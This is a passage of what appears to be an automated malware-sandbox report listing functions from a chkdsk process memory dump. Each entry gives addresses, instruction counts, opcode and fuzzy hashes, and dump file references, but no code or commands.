                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 89056d3d96a3de6f77bc47b61ffe10e7bd24c24334c5ba61c0fa513612b5c8d4
                                                                                                                    • Instruction ID: a71dc79e15fb79f91a89a358be27486afe9a5c2ecb1ef17378cbcd16cf756c97
                                                                                                                    • Opcode Fuzzy Hash: 89056d3d96a3de6f77bc47b61ffe10e7bd24c24334c5ba61c0fa513612b5c8d4
                                                                                                                    • Instruction Fuzzy Hash: 9632DE74A047598BEB24CF6AC854BBEBBFABF85304F244119D846DB384E7B4AC41CB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058564F0 Relevance: .4, Instructions: 383COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b6f01bd9b768bc8b097d048e157c290ff9922ecd62d0c49ede2db92955b74078
                                                                                                                    • Instruction ID: c0e9a6e24d77ccab4dfee02486829728120c9305caf7fe2a44e02b0937430041
                                                                                                                    • Opcode Fuzzy Hash: b6f01bd9b768bc8b097d048e157c290ff9922ecd62d0c49ede2db92955b74078
                                                                                                                    • Instruction Fuzzy Hash: 46E15C716083418FC714CF29C090A6ABBE1BF89328F558A6DED95C7351EB31ED09CB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0585D700 Relevance: .3, Instructions: 342COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b46e55b8bf8fc65f78ee08ed7495860f036ca0d2ece71421c8790c5ee6e5af90
                                                                                                                    • Instruction ID: 213289d4da484975c7417069e332fe57c8430b3e19ed93733f69ad999f42544b
                                                                                                                    • Opcode Fuzzy Hash: b46e55b8bf8fc65f78ee08ed7495860f036ca0d2ece71421c8790c5ee6e5af90
                                                                                                                    • Instruction Fuzzy Hash: 67C1A471A056169BEB28CF58C845BAEB7B6FF44324F148659EC56EB380D770EE41CB80
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05891763 Relevance: .3, Instructions: 322COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: dad0e596b9bf4e7433af9666f799ea9acc2bce88481098ea464bf624f40eb3e4
                                                                                                                    • Instruction ID: 9cba0f0f8cad84190d1d8616ff5dcdd415e8e59a3ffef01994685338f347f696
                                                                                                                    • Opcode Fuzzy Hash: dad0e596b9bf4e7433af9666f799ea9acc2bce88481098ea464bf624f40eb3e4
                                                                                                                    • Instruction Fuzzy Hash: 5BD11671A042099FDB55DF68C984B9A7BF9FF08344F0844BAED09DB256D730E901CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0586F380 Relevance: .3, Instructions: 321COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2ab18d0bc2cbdc50ba4b2a3360fd9466e2c748f8877d051c90a72837b0910152
                                                                                                                    • Instruction ID: 6bff2529c82408bbf87d070fd51e53bfcb9cb467673c8a52d8d71619d1ae669c
                                                                                                                    • Opcode Fuzzy Hash: 2ab18d0bc2cbdc50ba4b2a3360fd9466e2c748f8877d051c90a72837b0910152
                                                                                                                    • Instruction Fuzzy Hash: CCC1E276A092258BDB24CF18E4D4BB977A2FF48B04F194199EE42DF299E734CD41CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058537E4 Relevance: .3, Instructions: 303COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a44c6e4a319198af312551e2b94f1297a93442a65553c3a8a4c242bc9ef8b83d
                                                                                                                    • Instruction ID: ede39923dc642f396caa4e88359a3afa4d098ca5b81ae24c2871b9fe2f9cfa6a
                                                                                                                    • Opcode Fuzzy Hash: a44c6e4a319198af312551e2b94f1297a93442a65553c3a8a4c242bc9ef8b83d
                                                                                                                    • Instruction Fuzzy Hash: 4CC149B5A007099FDB15CFA8C840AAEBBF5FB48754F10442AE91AEB350EB34AD01CF55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05860445 Relevance: .3, Instructions: 300COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                                                                                    • Instruction ID: d4f738f71ba9b19feb7a2e34a8ed1650e35905ebced2e086bb4c5a9c02fd4a56
                                                                                                                    • Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                                                                                    • Instruction Fuzzy Hash: 60B1E131704605EFEB25CBA8C898BBEBBBABF84214F140558D952DB392DB70ED40CB55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0584C3C7 Relevance: .3, Instructions: 280COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f6c16a839f2be32f3b7667d52d18f04029af1e2bb81e90bea5d9a4a39d28478e
                                                                                                                    • Instruction ID: dd6cc2fd1fd44d9ee7087dbea17c0025b8e556e22436349863d5952fcdbd1dd6
                                                                                                                    • Opcode Fuzzy Hash: f6c16a839f2be32f3b7667d52d18f04029af1e2bb81e90bea5d9a4a39d28478e
                                                                                                                    • Instruction Fuzzy Hash: E1B16D70B042598ADB64DF68C894BBDB3B6BF44704F0585EADC4AE7281EB709D85CF21
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0587E507 Relevance: .3, Instructions: 278COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 744f1b7b8ed33fab037b0dacb6170a99ad5470676d084ab2d5a9b1590604a729
                                                                                                                    • Instruction ID: a6ccda5d40839b3849a0ac51d2ee2965792199539130e3b15ac28ec9b240a4cd
                                                                                                                    • Opcode Fuzzy Hash: 744f1b7b8ed33fab037b0dacb6170a99ad5470676d084ab2d5a9b1590604a729
                                                                                                                    • Instruction Fuzzy Hash: E6A1D471F0431CABEB25DBA8C848FAEBBA9BB05718F050155EE11EB290D7B4DD40CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058900A5 Relevance: .3, Instructions: 276COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c5d58c885af73d8604653ef4a882201bf8127eab013fb51a1c7172448f4888d0
                                                                                                                    • Instruction ID: ece225d71b8e84a7cee9da0e716f42b0599945fede97a9b4b75606b0ffedec08
                                                                                                                    • Opcode Fuzzy Hash: c5d58c885af73d8604653ef4a882201bf8127eab013fb51a1c7172448f4888d0
                                                                                                                    • Instruction Fuzzy Hash: BBA17D75B01619DBDF28DAA9C989BBAB7A6FF44314F48406DED09D7281DB34EC01DB80
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05924080 Relevance: .3, Instructions: 275COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d0ddb26a1c940016c0d7856e93463ef270e997d30460b80709d0863786c94bf6
                                                                                                                    • Instruction ID: ecd2cee70c69d6042507f946235299576e72d567a06fc5d62ff77c482fa91e62
                                                                                                                    • Opcode Fuzzy Hash: d0ddb26a1c940016c0d7856e93463ef270e997d30460b80709d0863786c94bf6
                                                                                                                    • Instruction Fuzzy Hash: D4A19CB2604721AFCB25DF18C984F6AB7E9FF48704F440928E98ADB654D734EC51CB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05851051 Relevance: .3, Instructions: 259COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3efcf454a533581822bae78c51d953b1211c64b4d927c8b186f695f4bc58a607
                                                                                                                    • Instruction ID: 7914ccb8d0d0f0c59e83ab6df6a8f4b8af7037e91676bbc1da6b134984329300
                                                                                                                    • Opcode Fuzzy Hash: 3efcf454a533581822bae78c51d953b1211c64b4d927c8b186f695f4bc58a607
                                                                                                                    • Instruction Fuzzy Hash: A3B101756093809FD754CF28C580A6AFBE1BB88304F18496EF99ACB352E771E845CB42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058593A6 Relevance: .3, Instructions: 259COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bd4c3121ae2784ca23716f3cf20d74d49f39620fc3bbbb295ea363cff9626f59
                                                                                                                    • Instruction ID: 39e660cb692444064f3d986dc29a29e6577fb37bd4cdaa67e057504396acfd23
                                                                                                                    • Opcode Fuzzy Hash: bd4c3121ae2784ca23716f3cf20d74d49f39620fc3bbbb295ea363cff9626f59
                                                                                                                    • Instruction Fuzzy Hash: FBB15A78A04205CFDF26CF19D441BA9B7A1BB48368F14419AEC26DB392DB70DD82CF91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0591A6C0 Relevance: .2, Instructions: 222COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                                                                                    • Instruction ID: 9b1157d27b497e8424e3f99b1e8aba3ab39fe1108b35ce13e63dfaccd5912ac2
                                                                                                                    • Opcode Fuzzy Hash: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                                                                                    • Instruction Fuzzy Hash: 53817071B012199BDF18CF98C484AAEB7B6BF84210F188569DC169B344DB34EE02CB94
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0590B0AF Relevance: .2, Instructions: 222COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                                                    • Instruction ID: e5cc9e32156b660daf16a23b791d491ebb9377e9e3817a0a217aa1fcfc82be99
                                                                                                                    • Opcode Fuzzy Hash: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                                                    • Instruction Fuzzy Hash: DC71BD31A0121A9FCB20CF59C591ABFB7BBFF44640F64591ADC11EB285EB34E951CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588E1A4 Relevance: .2, Instructions: 212COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 36c6beebf12b7a0348bacf6157d64dcebeb851c3658c76bb5598406fa357e4e4
                                                                                                                    • Instruction ID: 4840faa925f60aa955e3b9d40b172718ac6a4535e2b1eea2dcdfb669f4dfa102
                                                                                                                    • Opcode Fuzzy Hash: 36c6beebf12b7a0348bacf6157d64dcebeb851c3658c76bb5598406fa357e4e4
                                                                                                                    • Instruction Fuzzy Hash: BC812C71A00609AFDB25DFA8C880AEEB7BAFF48354F14442DE956E7250DB30AD45DB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0591970B Relevance: .2, Instructions: 210COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8a605f21e4e86f5e626e2f088b0284621df0a5a6b5830837be0759c5fe210191
                                                                                                                    • Instruction ID: 9ab592d04ada4832f97a4cc89c76c7c6b8e04f9c22743a9a33c579a23f157dcd
                                                                                                                    • Opcode Fuzzy Hash: 8a605f21e4e86f5e626e2f088b0284621df0a5a6b5830837be0759c5fe210191
                                                                                                                    • Instruction Fuzzy Hash: 4361B371F0422D9BDB29CF68C8A4BBE77AABF84314F184199EC1297284DB34DD01C798
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0586C560 Relevance: .2, Instructions: 206COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e65856c69f221226270978b04af9cc5b59ee763fbc20cf2115aa0e4a737f3053
                                                                                                                    • Instruction ID: ba5e85764848256911184b91fff47d7652b9c8218b65ee1dcbe27a5c546ca606
                                                                                                                    • Opcode Fuzzy Hash: e65856c69f221226270978b04af9cc5b59ee763fbc20cf2115aa0e4a737f3053
                                                                                                                    • Instruction Fuzzy Hash: 4371B0B59096299BDB25CF68C850AFEBBB9FF49710F14411AEC82E7340D7749C01CBA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0586252B Relevance: .2, Instructions: 201COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ea962d3dd453edf909f5cbbdfdd2d3e8e429a75b5cd67a4760be234d009db225
                                                                                                                    • Instruction ID: 1c94e5bdd65ff2be535462e57fd7aae8573b862647ddbd156e07221034cd20d9
                                                                                                                    • Opcode Fuzzy Hash: ea962d3dd453edf909f5cbbdfdd2d3e8e429a75b5cd67a4760be234d009db225
                                                                                                                    • Instruction Fuzzy Hash: 0C7189357046418FD721DF28C898B66B7E6FF84200F0485A9EC5ACB392EB34DD45CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05857623 Relevance: .2, Instructions: 179COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e176bb21eec7d96201ff25e2639aa94f197f47d1fd07a857bab1c6621a12a989
                                                                                                                    • Instruction ID: 8c8ff4db191574456c6a43c0647b3b84a6fc46edfb5d69f905087dfff92b120e
                                                                                                                    • Opcode Fuzzy Hash: e176bb21eec7d96201ff25e2639aa94f197f47d1fd07a857bab1c6621a12a989
                                                                                                                    • Instruction Fuzzy Hash: DA614175A04646AFDB08DF7CD484AADFBB6FF48354F24816AD819E7300DB30AD558B90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058577F9 Relevance: .2, Instructions: 164COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 652ab33e1a97de3521b286463741b25ce49de3ad004b9cef19c755975be1496e
                                                                                                                    • Instruction ID: 467352f8f54a66c6a99586465138b75afb0d713430f783b7aaf2d8128b8dc97e
                                                                                                                    • Opcode Fuzzy Hash: 652ab33e1a97de3521b286463741b25ce49de3ad004b9cef19c755975be1496e
                                                                                                                    • Instruction Fuzzy Hash: 27515971618301DFC724CF29C09492ABBEAFB89694F14896EED99D7354DB30EC44CB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588B490 Relevance: .2, Instructions: 161COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a5ba6a95f2134a0b09c6a269dea9c8b76dc259fb9d3f911a1f6d373e4c606a8f
                                                                                                                    • Instruction ID: 82c162e2c7c584523e0ebd3fc016a99d3347b71400402179cd69bcb695e97237
                                                                                                                    • Opcode Fuzzy Hash: a5ba6a95f2134a0b09c6a269dea9c8b76dc259fb9d3f911a1f6d373e4c606a8f
                                                                                                                    • Instruction Fuzzy Hash: 5151C3B52153059BD720EF68CD85F6A7BA8EB85324F14066DFD16D7291DB30EC00CBA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058794FA Relevance: .2, Instructions: 160COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: e6dea3e204e51a2ca94511bd66573a5f0ba592aae736664d0e4df20e43bc1578
